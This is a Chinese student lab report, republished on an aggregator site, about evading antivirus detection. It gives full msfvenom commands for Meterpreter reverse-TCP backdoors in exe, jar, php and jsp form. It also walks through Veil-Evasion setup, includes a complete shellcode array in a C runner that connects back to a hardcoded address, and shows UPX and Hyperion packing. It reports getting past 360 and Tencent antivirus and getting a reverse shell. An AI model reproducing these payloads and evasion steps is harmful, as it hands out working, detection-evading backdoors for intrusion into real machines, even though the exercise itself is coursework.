其他分享
首页 > 其他分享> > 2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践

作者:互联网

2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践

免杀的概述

免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为"反-反病毒",翻译为"反杀毒技术"。单从汉语"免杀"的字面意思来理解,可以将其看为一种能使病毒木马避免被杀毒软件查杀的技术。免杀这里有关于免杀的介绍和发展史及一些免杀技巧。

基础问题回答

  1. 恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。
  2. 假如程序修改了注册表、修改了权限等恶意行为,就会被杀软查到。
  1. 通过一些修改技术手段来逃避杀毒软件的检测扫描。
  1. 修改特征码:
    加壳,通过加壳,让杀毒软件无法进行反汇编、逆向工程,进而无法分析代码、对shellcode进行编码、重组。
  2. 修改恶意行为:
    多使用反弹式连接,使用加密技术隐藏,加入正常代码来掩盖恶意代码,隧道技术。

    实验内容

    一、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程

    1.1正确使用msf编码器

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.16.132 LPORT=5210 -f exe > 20165210-1.exe


msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.16.132 LPORT=5210 -f exe > 20165210-10.exe


msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.16.132 LPORT=5210 x> 20165210_java.jar

扫描如下:

- msfvenom生成php文件

生成PHP后门程序使用命令:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.16.132 LPORT=5210 x> 20165210_php.php

扫描如下:

- msfvenom生成jsp文件

生成JSP后门程序使用命令:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.16.132 LPORT=5210 -f raw > 20165210_jsp.jsp

扫描如下:

1.3使用veil-evasion

这里安装参考了学长的博客
如果直接使用

sudo apt-get install veil-evasion

可能会在安装过程中丢失一些压缩包。
可使用以下命令完整安装Veil-Evasion。

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
sudo apt-get update
sudo apt-get install veil-evasion

在终端下输入指令 veil 即可打开软件,按y开始安装,结果如图所示:

根本进行不了,一直卡在16%,要不就是卡在25%,安装失败,只能去拷一下别人的虚拟机了,真的是崩溃,用了成功的虚拟机打开了veil

use evasion

命令进入Evil-Evasion

用命令

use c/meterpreter/rev_tcp.py

进入配置界面

设置反弹连接IP,命令为:

set LHOST 192.168.199.198

,注意此处的IP是KaliIP
设置端口,命令为:set LPORT 5210

输入generate生成文件,接着输入你想要playload的名字:playload5210

按照路径找到文件扫描试一下

咦,还不错。

1.4编写注入Shellcode并执行

首先使用命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.198 LPORT=5210 -f

c用c语言生成一段shellcode,创建一个文件20165318.c,然后将unsigned char buf[]赋值到其中,代码如下:

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc7\xc6"
"\x68\x02\x00\x14\x5a\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

使用命令:

i686-w64-mingw32-g++ 20165210.c -o 20165210.exe

编译这个.c文件为可执行文件

然后把可执行文件扫描一下如图:

1.5使用加壳试一下

upx 20165210.exe -o 20165210-jk.exe

扫描一下

wine hyperion.exe -v 20165210-jk.exe 20165210_Hyperion.exe

进行加壳

扫描一下

二、通过组合应用各种技术实现恶意代码免杀

首先用C语言生成一段shellcode,然后将C语言文件变成可执行文件,然后进行加壳,先进行压缩壳,然后进行加密壳(具体操作可看上面任务一)
然后进行查杀如图:
360查杀:

腾讯管家查杀:

yeah成功免杀!但是很有趣的是,这些杀软都是只在第一次扫描不出来,你再次查杀是就会被发现,很意外,但是一想这些360什么的软件又不是傻瓜杀软(比如江民杀软哈哈哈哈哈)我觉得可能是什么云病毒的这个特征库的更新有关吧,也不是太清楚。

三、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

对方电脑的版本:Windows 7x64 虚拟机

杀软名称版本:腾讯管家13.0.19837.233

实验的步骤和上面一样,实现免杀如图:

实现反弹连接:

四、实验的心得与体会

  1. 这个实验做得真的是十分的曲折,首先就是安装veil,真的太困难了,真的卡在了展开对象25%那里了,一晚上都没动,重新再安装的时候直接把kali卡黑屏,然后重启kali就一直弹用户名密码进不去,然后再过一会电脑直接蓝屏,omg,直接重启了进入了bios,崩溃,只能再拷一下虚拟机
  2. 接下来就是有个疑问就是为什么第一次杀软查不出来,第二次扫描就扫描出来了。
  3. 还有就是加壳强!!!哈哈哈
  4. 总结

标签:x68,exe,免杀,Exp3,xff,x8b,2019,20165210,x00
来源: https://www.cnblogs.com/lyklyk/p/10631313.html